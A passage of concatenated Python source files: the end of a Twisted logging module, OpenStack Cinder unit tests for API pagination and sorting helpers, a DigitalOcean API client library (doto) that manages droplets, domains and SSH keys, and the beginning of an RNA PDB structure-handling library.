encoding=getattr(oldStream, "encoding", None),
)
setattr(self._stdio, stream, loggingFile)
def showwarning(
self, message, category, filename, lineno, file=None, line=None
):
"""
Twisted-enabled wrapper around L{warnings.showwarning}.
If C{file} is C{None}, the default behaviour is to emit the warning to
the log system, otherwise the original L{warnings.showwarning} Python
function is called.
@param message: A warning message to emit.
@type message: L{str}
@param category: A warning category to associate with C{message}.
@type category: L{warnings.Warning}
@param filename: A file name for the source code file issuing the
warning.
@type warning: L{str}
@param lineno: A line number in the source file where the warning was
issued.
@type lineno: L{int}
@param file: A file to write the warning message to. If C{None},
write to L{sys.stderr}.
@type file: file-like object
@param line: A line of source code to include with the warning message.
If C{None}, attempt to read the line from C{filename} and
C{lineno}.
@type line: L{str}
"""
if file is None:
self._log.warn(
"{filename}:{lineno}: {category}: {warning}",
warning=message, category=qual(category),
filename=filename, lineno=lineno,
)
else:
if sys.version_info < (2, 6):
self._oldshowwarning(message, category, filename, lineno, file)
else:
self._oldshowwarning(
message, category, filename, lineno, file, line
)
globalLogPublisher = LogPublisher()
globalLogBeginner = LogBeginner(globalLogPublisher, sys.stderr, sys, warnings)
|
|
# Copyright 2010 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Test suites for 'common' code used throughout the OpenStack HTTP API.
"""
import mock
from testtools import matchers
import webob
import webob.exc
from oslo_config import cfg
from cinder.api import common
from cinder import test
NS = "{http://docs.openstack.org/compute/api/v1.1}"
ATOMNS = "{http://www.w3.org/2005/Atom}"
CONF = cfg.CONF
class LimiterTest(test.TestCase):
"""Unit tests for the `cinder.api.common.limited` method.
This method takes in a list of items and, depending on the 'offset'
and 'limit' GET params, returns a subset or complete set of the given
items.
"""
def setUp(self):
"""Run before each test."""
super(LimiterTest, self).setUp()
self.tiny = range(1)
self.small = range(10)
self.medium = range(1000)
self.large = range(10000)
def test_limiter_offset_zero(self):
"""Test offset key works with 0."""
req = webob.Request.blank('/?offset=0')
self.assertEqual(self.tiny, common.limited(self.tiny, req))
self.assertEqual(self.small, common.limited(self.small, req))
self.assertEqual(self.medium, common.limited(self.medium, req))
self.assertEqual(self.large[:1000], common.limited(self.large, req))
def test_limiter_offset_medium(self):
"""Test offset key works with a medium sized number."""
req = webob.Request.blank('/?offset=10')
self.assertEqual([], common.limited(self.tiny, req))
self.assertEqual(self.small[10:], common.limited(self.small, req))
self.assertEqual(self.medium[10:], common.limited(self.medium, req))
self.assertEqual(self.large[10:1010], common.limited(self.large, req))
def test_limiter_offset_over_max(self):
"""Test offset key works with a number over 1000 (max_limit)."""
req = webob.Request.blank('/?offset=1001')
self.assertEqual([], common.limited(self.tiny, req))
self.assertEqual([], common.limited(self.small, req))
self.assertEqual([], common.limited(self.medium, req))
self.assertEqual(
common.limited(self.large, req), self.large[1001:2001])
def test_limiter_offset_blank(self):
"""Test offset key works with a blank offset."""
req = webob.Request.blank('/?offset=')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_offset_bad(self):
"""Test offset key works with a BAD offset."""
req = webob.Request.blank(u'/?offset=\u0020aa')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_nothing(self):
"""Test request with no offset or limit."""
req = webob.Request.blank('/')
self.assertEqual(self.tiny, common.limited(self.tiny, req))
self.assertEqual(self.small, common.limited(self.small, req))
self.assertEqual(self.medium, common.limited(self.medium, req))
self.assertEqual(self.large[:1000], common.limited(self.large, req))
def test_limiter_limit_zero(self):
"""Test limit of zero."""
req = webob.Request.blank('/?limit=0')
self.assertEqual(self.tiny, common.limited(self.tiny, req))
self.assertEqual(self.small, common.limited(self.small, req))
self.assertEqual(self.medium, common.limited(self.medium, req))
self.assertEqual(self.large[:1000], common.limited(self.large, req))
def test_limiter_limit_bad(self):
"""Test with a bad limit."""
req = webob.Request.blank(u'/?limit=hello')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_limit_medium(self):
"""Test limit of 10."""
req = webob.Request.blank('/?limit=10')
self.assertEqual(self.tiny, common.limited(self.tiny, req))
self.assertEqual(self.small, common.limited(self.small, req))
self.assertEqual(self.medium[:10], common.limited(self.medium, req))
self.assertEqual(self.large[:10], common.limited(self.large, req))
def test_limiter_limit_over_max(self):
"""Test limit of 3000."""
req = webob.Request.blank('/?limit=3000')
self.assertEqual(self.tiny, common.limited(self.tiny, req))
self.assertEqual(self.small, common.limited(self.small, req))
self.assertEqual(self.medium, common.limited(self.medium, req))
self.assertEqual(self.large[:1000], common.limited(self.large, req))
def test_limiter_limit_and_offset(self):
"""Test request with both limit and offset."""
items = range(2000)
req = webob.Request.blank('/?offset=1&limit=3')
self.assertEqual(items[1:4], common.limited(items, req))
req = webob.Request.blank('/?offset=3&limit=0')
self.assertEqual(items[3:1003], common.limited(items, req))
req = webob.Request.blank('/?offset=3&limit=1500')
self.assertEqual(items[3:1003], common.limited(items, req))
req = webob.Request.blank('/?offset=3000&limit=10')
self.assertEqual([], common.limited(items, req))
def test_limiter_custom_max_limit(self):
"""Test a max_limit other than 1000."""
items = range(2000)
req = webob.Request.blank('/?offset=1&limit=3')
self.assertEqual(
items[1:4], common.limited(items, req, max_limit=2000))
req = webob.Request.blank('/?offset=3&limit=0')
self.assertEqual(
items[3:], common.limited(items, req, max_limit=2000))
req = webob.Request.blank('/?offset=3&limit=2500')
self.assertEqual(
items[3:], common.limited(items, req, max_limit=2000))
req = webob.Request.blank('/?offset=3000&limit=10')
self.assertEqual([], common.limited(items, req, max_limit=2000))
def test_limiter_negative_limit(self):
"""Test a negative limit."""
req = webob.Request.blank('/?limit=-3000')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_negative_offset(self):
"""Test a negative offset."""
req = webob.Request.blank('/?offset=-30')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
class PaginationParamsTest(test.TestCase):
"""Unit tests for `cinder.api.common.get_pagination_params` method.
This method takes in a request object and returns 'marker' and 'limit'
GET params.
"""
def test_nonnumerical_limit(self):
"""Test nonnumerical limit param."""
req = webob.Request.blank('/?limit=hello')
self.assertRaises(
webob.exc.HTTPBadRequest, common.get_pagination_params,
req.GET.copy())
def test_no_params(self):
"""Test no params."""
req = webob.Request.blank('/')
expected = (None, CONF.osapi_max_limit, 0)
self.assertEqual(expected,
common.get_pagination_params(req.GET.copy()))
def test_valid_marker(self):
"""Test valid marker param."""
marker = '263abb28-1de6-412f-b00b-f0ee0c4333c2'
req = webob.Request.blank('/?marker=' + marker)
expected = (marker, CONF.osapi_max_limit, 0)
self.assertEqual(expected,
common.get_pagination_params(req.GET.copy()))
def test_valid_limit(self):
"""Test valid limit param."""
req = webob.Request.blank('/?limit=10')
expected = (None, 10, 0)
self.assertEqual(expected,
common.get_pagination_params(req.GET.copy()))
def test_invalid_limit(self):
"""Test invalid limit param."""
req = webob.Request.blank('/?limit=-2')
self.assertRaises(
webob.exc.HTTPBadRequest, common.get_pagination_params,
req.GET.copy())
def test_valid_limit_and_marker(self):
"""Test valid limit and marker parameters."""
marker = '263abb28-1de6-412f-b00b-f0ee0c4333c2'
req = webob.Request.blank('/?limit=20&marker=%s' % marker)
expected = (marker, 20, 0)
self.assertEqual(expected,
common.get_pagination_params(req.GET.copy()))
class SortParamUtilsTest(test.TestCase):
def test_get_sort_params_defaults(self):
"""Verifies the default sort key and direction."""
sort_keys, sort_dirs = common.get_sort_params({})
self.assertEqual(['created_at'], sort_keys)
self.assertEqual(['desc'], sort_dirs)
def test_get_sort_params_override_defaults(self):
"""Verifies that the defaults can be overriden."""
sort_keys, sort_dirs = common.get_sort_params({}, default_key='key1',
default_dir='dir1')
self.assertEqual(['key1'], sort_keys)
self.assertEqual(['dir1'], sort_dirs)
def test_get_sort_params_single_value_sort_param(self):
"""Verifies a single sort key and direction."""
params = {'sort': 'key1:dir1'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1'], sort_keys)
self.assertEqual(['dir1'], sort_dirs)
def test_get_sort_params_single_value_old_params(self):
"""Verifies a single sort key and direction."""
params = {'sort_key': 'key1', 'sort_dir': 'dir1'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1'], sort_keys)
self.assertEqual(['dir1'], sort_dirs)
def test_get_sort_params_single_with_default_sort_param(self):
"""Verifies a single sort value with a default direction."""
params = {'sort': 'key1'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1'], sort_keys)
# Direction should be defaulted
self.assertEqual(['desc'], sort_dirs)
def test_get_sort_params_single_with_default_old_params(self):
"""Verifies a single sort value with a default direction."""
params = {'sort_key': 'key1'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1'], sort_keys)
# Direction should be defaulted
self.assertEqual(['desc'], sort_dirs)
def test_get_sort_params_multiple_values(self):
"""Verifies multiple sort parameter values."""
params = {'sort': 'key1:dir1,key2:dir2,key3:dir3'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['dir1', 'dir2', 'dir3'], sort_dirs)
def test_get_sort_params_multiple_not_all_dirs(self):
"""Verifies multiple sort keys without all directions."""
params = {'sort': 'key1:dir1,key2,key3:dir3'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
# Second key is missing the direction, should be defaulted
self.assertEqual(['dir1', 'desc', 'dir3'], sort_dirs)
def test_get_sort_params_multiple_override_default_dir(self):
"""Verifies multiple sort keys and overriding default direction."""
params = {'sort': 'key1:dir1,key2,key3'}
sort_keys, sort_dirs = common.get_sort_params(params,
default_dir='foo')
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['dir1', 'foo', 'foo'], sort_dirs)
def test_get_sort_params_params_modified(self):
"""Verifies that the input sort parameter are modified."""
params = {'sort': 'key1:dir1,key2:dir2,key3:dir3'}
common.get_sort_params(params)
self.assertEqual({}, params)
params = {'sort_dir': 'key1', 'sort_dir': 'dir1'}
common.get_sort_params(params)
self.assertEqual({}, params)
def test_get_sort_params_random_spaces(self):
"""Verifies that leading and trailing spaces are removed."""
params = {'sort': ' key1 : dir1,key2: dir2 , key3 '}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['dir1', 'dir2', 'desc'], sort_dirs)
def test_get_params_mix_sort_and_old_params(self):
"""An exception is raised if both types of sorting params are given."""
for params in ({'sort': 'k1', 'sort_key': 'k1'},
{'sort': 'k1', 'sort_dir': 'd1'},
{'sort': 'k1', 'sort_key': 'k1', 'sort_dir': 'd2'}):
self.assertRaises(webob.exc.HTTPBadRequest,
common.get_sort_params,
params)
class MiscFunctionsTest(test.TestCase):
def test_remove_major_version_from_href(self):
fixture = 'http://www.testsite.com/v1/images'
expected = 'http://www.testsite.com/images'
actual = common.remove_version_from_href(fixture)
self.assertEqual(expected, actual)
def test_remove_version_from_href(self):
fixture = 'http://www.testsite.com/v1.1/images'
expected = 'http://www.testsite.com/images'
actual = common.remove_version_from_href(fixture)
self.assertEqual(expected, actual)
def test_remove_version_from_href_2(self):
fixture = 'http://www.testsite.com/v1.1/'
expected = 'http://www.testsite.com/'
actual = common.remove_version_from_href(fixture)
self.assertEqual(expected, actual)
def test_remove_version_from_href_3(self):
fixture = 'http://www.testsite.com/v10.10'
expected = 'http://www.testsite.com'
actual = common.remove_version_from_href(fixture)
self.assertEqual(expected, actual)
def test_remove_version_from_href_4(self):
fixture = 'http://www.testsite.com/v1.1/images/v10.5'
expected = 'http://www.testsite.com/images/v10.5'
actual = common.remove_version_from_href(fixture)
self.assertEqual(expected, actual)
def test_remove_version_from_href_bad_request(self):
fixture = 'http://www.testsite.com/1.1/images'
self.assertRaises(ValueError,
common.remove_version_from_href,
fixture)
def test_remove_version_from_href_bad_request_2(self):
fixture = 'http://www.testsite.com/v/images'
self.assertRaises(ValueError,
common.remove_version_from_href,
fixture)
def test_remove_version_from_href_bad_request_3(self):
fixture = 'http://www.testsite.com/v1.1images'
self.assertRaises(ValueError,
common.remove_version_from_href,
fixture)
class TestCollectionLinks(test.TestCase):
"""Tests the _get_collection_links method."""
def _validate_next_link(self, item_count, osapi_max_limit, limit,
should_link_exist):
req = webob.Request.blank('/?limit=%s' % limit if limit else '/')
link_return = [{"rel": "next", "href": "fake_link"}]
self.flags(osapi_max_limit=osapi_max_limit)
if limit is None:
limited_list_size = min(item_count, osapi_max_limit)
else:
limited_list_size = min(item_count, osapi_max_limit, limit)
limited_list = [{"uuid": str(i)} for i in range(limited_list_size)]
builder = common.ViewBuilder()
def get_pagination_params(params, max_limit=CONF.osapi_max_limit,
original_call=common.get_pagination_params):
return original_call(params, max_limit)
def _get_limit_param(params, max_limit=CONF.osapi_max_limit,
original_call=common._get_limit_param):
return original_call(params, max_limit)
with mock.patch.object(common, 'get_pagination_params',
get_pagination_params), \
mock.patch.object(common, '_get_limit_param',
_get_limit_param), \
mock.patch.object(common.ViewBuilder, '_generate_next_link',
return_value=link_return) as href_link_mock:
results = builder._get_collection_links(req, limited_list,
mock.sentinel.coll_key,
item_count, "uuid")
if should_link_exist:
href_link_mock.assert_called_once_with(limited_list, "uuid",
req,
mock.sentinel.coll_key)
self.assertThat(results, matchers.HasLength(1))
else:
self.assertFalse(href_link_mock.called)
self.assertThat(results, matchers.HasLength(0))
def test_items_equals_osapi_max_no_limit(self):
item_count = 5
osapi_max_limit = 5
limit = None
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_equals_osapi_max_greater_than_limit(self):
item_count = 5
osapi_max_limit = 5
limit = 4
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_equals_osapi_max_equals_limit(self):
item_count = 5
osapi_max_limit = 5
limit = 5
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_equals_osapi_max_less_than_limit(self):
item_count = 5
osapi_max_limit = 5
limit = 6
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_less_than_osapi_max_no_limit(self):
item_count = 5
osapi_max_limit = 7
limit = None
should_link_exist = False
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_limit_less_than_items_less_than_osapi_max(self):
item_count = 5
osapi_max_limit = 7
limit = 4
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_limit_equals_items_less_than_osapi_max(self):
item_count = 5
osapi_max_limit = 7
limit = 5
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_less_than_limit_less_than_osapi_max(self):
item_count = 5
osapi_max_limit = 7
limit = 6
should_link_exist = False
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_less_than_osapi_max_equals_limit(self):
item_count = 5
osapi_max_limit = 7
limit = 7
should_link_exist = False
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_less_than_osapi_max_less_than_limit(self):
item_count = 5
osapi_max_limit = 7
limit = 8
should_link_exist = False
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_greater_than_osapi_max_no_limit(self):
item_count = 5
osapi_max_limit = 3
limit = None
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_limit_less_than_items_greater_than_osapi_max(self):
item_count = 5
osapi_max_limit = 3
limit = 2
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_greater_than_osapi_max_equals_limit(self):
item_count = 5
osapi_max_limit = 3
limit = 3
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_greater_than_limit_greater_than_osapi_max(self):
item_count = 5
osapi_max_limit = 3
limit = 4
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_equals_limit_greater_than_osapi_max(self):
item_count = 5
osapi_max_limit = 3
limit = 5
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_limit_greater_than_items_greater_than_osapi_max(self):
item_count = 5
osapi_max_limit = 3
limit = 6
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
class LinkPrefixTest(test.TestCase):
def test_update_link_prefix(self):
vb = common.ViewBuilder()
result = vb._update_link_prefix("http://192.168.0.243:24/",
"http://127.0.0.1/volume")
self.assertEqual("http://127.0.0.1/volume", result)
result = vb._update_link_prefix("http://foo.x.com/v1",
"http://new.prefix.com")
self.assertEqual("http://new.prefix.com/v1", result)
result = vb._update_link_prefix(
"http://foo.x.com/v1",
"http://new.prefix.com:20455/new_extra_prefix")
self.assertEqual("http://new.prefix.com:20455/new_extra_prefix/v1",
result)
|
|
from __future__ import print_function, division, absolute_import
import requests
from doto.logger import log
from doto.config import Config
from doto.droplet import Droplet
from doto.image import Image
from doto.domain import Domain
from doto.connection import connection
from Crypto.PublicKey import RSA
import os
from os.path import join as pjoin
try:
os.path.expanduser('~')
expanduser = os.path.expanduser
except (AttributeError, ImportError):
# This is probably running on App Engine.
expanduser = (lambda x: x)
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
BASEURL = "https://api.digitalocean.com"
class connect_d0(object):
def __init__(self, path=None, log_flag=True, client_id=None,api_key=None ):
'''
:type path: string
:param path: path to valid doto credentials
:type log_flag: bool
:param log_flag: set logging on or off. Logging is on by default
:type client_id: string
:param client_id: client id credential
:type api_key: string
:param api_key: api key credential
'''
#logging is off when log.disabled is set to True
if not log_flag:
log.disabled = True
self.config = Config(path)
self._client_id = client_id or self.config.get('Credentials','client_id')
self._api_key = api_key or self.config.get('Credentials','api_key')
self._conn = connection(self._client_id, self._api_key)
def __str__(self):
return "DigitialOcean Connection Object"
def __repr__(self):
return "D0:Connected"
def _set_logging(self,debug=True):
"""
Convenience function to set logging on/off
"""
#logging is off when log.disabled is set to True
if not debug:
log.disabled = True
else:
log.disabled = False
def _pprint_table(self, data):
"""
pprint table: from stackoverflow:
http://stackoverflow.com/a/8356620
"""
table = []
for d in data:
table.append([unicode(v) for v in d.values()])
header = d.keys()
table.insert(0,header)
col_width = [max(len(x) for x in col) for col in zip(*table)]
for line in table:
print("| " + " | ".join("{:{}}".format(x, col_width[i])
for i, x in enumerate(line)) + " |")
def create_droplet(self,name=None,size_id=None,image_id=None,
region_id=None,ssh_key_ids=None,private_networking=None):
"""
Creates a droplet
:type name: string
:param name: The NAME of the droplet (name will be used as a reference
on D0's servers)
:type size_id: int
:param size_id: The ID corresponding to requested size of the image (see
connect_d0.get_sizes)
:type image_id: int
:param image_id: The ID corresponding to the requested image (see
connect_d0.images)
:type region_id: int
:param region_id: The ID corresponding to the requested region (see
connect_d0.region_id)
:type ssh_key_ids: int
:param ssh_key_ids: An optional list of comma separated IDs corresponding
to the requested ssh_keys to be added to the server
(see connect_d0.get_ssh_keys)
:type private_networking: int
:param private_networking: An optional bool which enables a private network interface
if the region supports private networking
droplet = d0.create_droplet(name='Random',
size_id=66, #512MB
image_id=1341147, #Docker 0.7 Ubuntu 13.04 x64
region_id=1, #New York
ssh_key_ids=18669
)
"""
#ssh_key_ids check/convert to string
if isinstance(ssh_key_ids,(tuple,list)):
ssh_key_ids = ', '.join(str(key) for key in ssh_key_ids)
data = self._conn.request("/droplets/new",name=name,
size_id=size_id,image_id=image_id,
region_id=region_id,ssh_key_ids=ssh_key_ids,
private_networking=private_networking)
droplet = Droplet(conn=self._conn, **data['droplet'])
droplet.update()
droplet.event_update()
return droplet
# https://api.digitalocean.com/droplets/new?client_id=[your_client_id]&api_key=[your_api_key]&
# name=[droplet_name]&size_id=[size_id]&image_id=[image_id]®ion_id=[region_id]&ssh_key_ids=
# [ssh_key_id1],[ssh_key_id2]
def get_droplet_by_name(self, name):
"""
Convenience method to make it easy to select a droplet by name
"""
droplets = self.get_all_droplets()
for d in droplets:
if d.name == name:
return d
return None
def get_all_droplets(self,filters=None, status_check=None, table=False, raw_data=False):
"""
This method returns all active droplets that are currently running in your account.
All available API information is presented for each droplet.
https://api.digitalocean.com/droplets/?
client_id=[your_client_id]&api_key=[your_api_key]
:rtype: list
:return: A list of :class:`doto.Droplet`
"""
log.debug("Get All Droplets")
data = self._conn.request("/droplets",status_check)
if status_check:
return data
if raw_data:
return data
if table:
self._pprint_table(data['droplets'])
return
droplets = data['droplets']
if filters:
droplets = [Droplet(conn=self._conn, **drop) for drop in droplets]
for k,v in filters.iteritems():
droplets = filter(lambda x: v in getattr(x,k), droplets)
return droplets
#convert dictionary to droplet objects
return [Droplet(conn=self._conn, **drop) for drop in droplets]
def get_droplet(self, id=None, raw_data=False):
"""
This method returns full information for a specific droplet ID that is passed in the URL.
:type id: int
:param id: ID of the droplet
https://api.digitalocean.com/droplets/[droplet_id]?
client_id=[your_client_id]&api_key=[your_api_key]
"""
data = self._conn.request("/droplets/"+str(id))
if raw_data:
return data
#convert dictionary to droplet objects
return Droplet(conn=self._conn, **data['droplet'])
def get_sizes(self,status_check=None, table=False):
"""
This method returns all the available sizes that can be used to create a droplet.
https://api.digitalocean.com/sizes/?
client_id=[your_client_id]&api_key=[your_api_key]
"""
data = self._conn.request("/sizes", status_check)
if status_check:
return data
sizes = data['sizes']
if table:
self._pprint_table(sizes)
return sizes
def get_all_regions(self,status_check=None, table=False):
"""
This method will return all the available regions within the DigitalOcean cloud.
https://api.digitalocean.com/sizes/?
client_id=[your_client_id]&api_key=[your_api_key]
"""
data = self._conn.request("/regions", status_check)
if status_check:
return data
regions = data['regions']
if table:
self._pprint_table(regions)
return regions
def get_domains(self, status_check=None, table=False):
"""
This method returns all of your current domains.
https://api.digitalocean.com/domains/?
client_id=[your_client_id]&api_key=[your_api_key]
"""
data = self._conn.request("/domains", status_check)
if status_check:
return data
domains = data['domains']
if table:
self._pprint_table(domains)
return domains
def get_all_ssh_keys(self, status_check=None, table=False):
"""
This method lists all the available public SSH keys in
your account that can be added to a droplet.
https://api.digitalocean.com/ssh_keys/?
client_id=[your_client_id]&api_key=[your_api_key]
"""
data = self._conn.request("/ssh_keys", status_check)
if status_check:
return data
sshkeys = data['ssh_keys']
if table:
self._pprint_table(sshkeys)
return sshkeys
def create_key_pair(self, ssh_key_name=None, cli=False, dry_run=False):
"""
Method to create a key pair and store the public key on Digital Ocean's servers.
SSH Keys are store in ~/.ssh/
NOTE: All key names are prepended with d0 to help disambiguate Digital Ocean keys
:type ssh_key_name: string
:param ssh_key_name: The name of the new keypair
:type dry_run: cli
:param dry_run: Set to True if you are using the cli utility and want the path defined
~/.ssh/my_new_key
:type dry_run: bool
:param dry_run: Set to True if the operation should not actually run.
:rtype: dict
:return: Dictionary of SSH key info and local path
https://api.digitalocean.com/ssh_keys/new/?name=[ssh_key_name]&ssh_pub_key=[ssh_public_key]&
client_id=[your_client_id]&api_key=[your_api_key]
"""
path, file = os.path.split(ssh_key_name)
file = 'd0_'+file
if not cli:
path = pjoin(expanduser('~'), '.ssh')
else:
path = expanduser(path)
if not os.path.isdir(path):
os.makedirs(path)
keyfile = pjoin(path, file)
key = RSA.generate(2048,os.urandom)
#public key
with open(keyfile+'.pub','w') as f:
f.write(key.exportKey('OpenSSH'))
public_key = key.exportKey('OpenSSH')
os.chmod(keyfile+'.pub', 0o0600)
#private key
with open(keyfile,'w') as f:
f.write(key.exportKey())
os.chmod(keyfile, 0o0600)
if dry_run:
return
data = self._conn.request("/ssh_keys/new/", name=file,
ssh_pub_key=public_key)
#include path to newly created file
data['ssh_key']['path'] = keyfile
log.debug(data['ssh_key'])
return data['ssh_key']
def delete_key_pair(self, ssh_key_id=None):
"""
Delete the SSH key from your account.
:type ssh_key_id: int
:param ssh_key_id: The ID of the public key
https://api.digitalocean.com/ssh_keys/[ssh_key_id]/destroy/?
client_id=[your_client_id]&api_key=[your_api_key]
"""
url = "/ssh_keys/%d/destroy" % (ssh_key_id)
data = self._conn.request(url)
log.debug(data)
def get_ssh_key(self, ssh_key_id=None):
"""
Delete the SSH key from your account.
:type ssh_key_id: int
:param ssh_key_id: The ID of the public key
https://api.digitalocean.com/ssh_keys/[ssh_key_id]/destroy/?
client_id=[your_client_id]&api_key=[your_api_key]
"""
url = "/ssh_keys/%d" % (ssh_key_id)
data = self._conn.request(url)
log.debug(data)
def get_image_by_name(self, name):
"""
Convenience method to make it easy to select a droplet by name
"""
images = self.get_all_images()
for img in images:
if img.name == name:
return img
return None
def get_all_images(self, filters=None, status_check=False, table=False, raw_data=False):
"""
Convenience method to get Digital Ocean's list of public images
and users current private images
using EC2 style filtering
https://api.digitalocean.com/sizes/?client_id=[your_client_id]&api_key=[your_api_key]
:type filters: dict
:param filters: Optional filters that can be used to limit the
results returned. Filters are provided in the form of a
dictionary consisting of filter names as the key and
filter values as the value. The set of allowable filter
names/values is dependent on the request being performed.
Check the DigitalOcean API guide for details.
:rtype: list
:return: A list of :class:`doto.Image` objects
https://api.digitalocean.com/images/?
client_id=[your_client_id]&api_key=[your_api_key]
"""
data = self._conn.request("/images", status_check)
if raw_data:
return data
if status_check:
return data
if table:
self._pprint_table(data['images'])
return
images = data['images']
if filters:
images = [Image(conn=self._conn,**img) for img in images]
for k,v in filters.iteritems():
images = filter(lambda x: v in getattr(x,k), images)
return images
#convert dictionary to Image objects
return [Image(conn=self._conn, **img) for img in images]
def get_image(self, image_id=None):
"""
This method displays the attributes of an image.
:type image_id: int
:param image_id: The ID of the image
:rtype: :class:`doto.Image`
:return: The newly created :class:`doto.Image`.
https://api.digitalocean.com/images/[image_id]/?
client_id=[your_client_id]&api_key=[your_api_key]
"""
url = "/images/%d" % (image_id)
data = self._conn.request(url)
log.debug(data)
return Image(conn=self._conn, **data['image'])
def get_all_domains(self,filters=None, status_check=None, table=False, raw_data=False):
"""
This method returns all active droplets that are currently running in your account.
All available API information is presented for each droplet.
https://api.digitalocean.com/droplets/?
client_id=[your_client_id]&api_key=[your_api_key]
:rtype: list
:return: A list of :class:`doto.Droplet`
"""
data = self._conn.request("/domains",status_check)
if status_check:
return data
if raw_data:
return data
if table:
self._pprint_table(data['domains'])
return
domains = data['domains']
if filters:
doms = [Domain(conn=self._conn, **drop) for drop in domains]
for k,v in filters.iteritems():
doms = filter(lambda x: v in getattr(x,k), doms)
return doms
#convert dictionary to droplet objects
return [Domain(conn=self._conn, **dom) for dom in domains]
def create_domain(self,name=None,ip_addr=None):
"""
This method creates a new domain name with an A record for the specified [ip_address].
:type name: string
:param size: The NAME of the domain
:type ip_address: string
:param size: ip address for the domain's initial a record.
https://api.digitalocean.com/domains/new?
client_id=[your_client_id]&api_key=[your_api_key]&name=[domain]&ip_address=[ip_address]
"""
log.debug("Creating new domain")
data = self._conn.request("/domains/new",name=name,
ip_address=ip_addr)
log.debug(data)
domain = Domain(conn=self._conn, **data['domain'])
return domain
def get_domain(self, domain_id=None):
"""
This method displays the attributes of an image.
:type image_id: int
:param image_id: The ID of the image
:rtype: :class:`doto.Image`
:return: The newly created :class:`doto.Image`.
https://api.digitalocean.com/domains/[domain_id]?
client_id=[your_client_id]&api_key=[your_api_key]
"""
url = "/domains/%d" % (domain_id)
data = self._conn.request(url)
log.debug(data)
return Domain(conn=self._conn, **data['domain'])
|
|
#!/usr/bin/env python
"""
library for manipulating PDB structures
"""
import sys
import os
import re
import shutil
try:
from io import StringIO ## for Python 2
except ImportError:
from io import StringIO ## for Python 3
#import simplejson
import gzip
import tempfile
from optparse import OptionParser
from itertools import combinations
from scipy.spatial import KDTree
from Bio import PDB
import numpy as np
from numpy import array
from rna_tools.tools.clarna_play.ClaRNAlib.normalize_pdb import normalize_pdb
from rna_tools.tools.clarna_play.ClaRNAlib.utils import dist, REQ_ATOMS_LIST, simplify_residue
class StructureCiachCiach(object):
def __init__(self, structure, dont_normalize=False, req_atoms_list=REQ_ATOMS_LIST):
self.s = structure
self.dont_normalize = dont_normalize
self.res_dict = {}
# not used at this moment
# self.backbone_atoms = ["O3'", "C3'", "C4'", "C5'", "O5'", "P"]
for r in structure.get_residues():
if r.get_id()[0] != ' ':
continue
if dont_normalize:
key = r.parent.id + (str(r.get_id()[1])+str(r.get_id()[2])).strip()
else:
key = str(r.get_id()[1])
self.res_dict[key] = r
self.good_residues = []
self.good_residues_num = {}
p_coord = []
o3p_coord = []
c1p_coord = []
for (key,r) in list(self.res_dict.items()):
resname = r.get_resname().strip()
if len(resname)!=1:
continue
atoms = simplify_residue(r)
if atoms is None or not all([a in atoms for a in req_atoms_list]):
continue
p_atom = self._locate_atom(r, 'P')
if p_atom is None:
p_atom = [0,0,0]
else:
p_atom = p_atom.get_coord()
o3p_atom = self._locate_atom(r, "O3'")
if o3p_atom is None:
o3p_atom = [0,0,0]
else:
o3p_atom = o3p_atom.get_coord()
c1p_atom = self._locate_atom(r, "C1'")
if c1p_atom is None:
c1p_atom = [0,0,0]
else:
c1p_atom = c1p_atom.get_coord()
self.good_residues_num[key] = len(self.good_residues)
self.good_residues.append(key)
p_coord.append(p_atom)
o3p_coord.append(o3p_atom)
c1p_coord.append(c1p_atom)
if len(p_coord)==0:
p_coord.append(array([0,0,0],'f'))
if len(o3p_coord)==0:
o3p_coord.append(array([0,0,0],'f'))
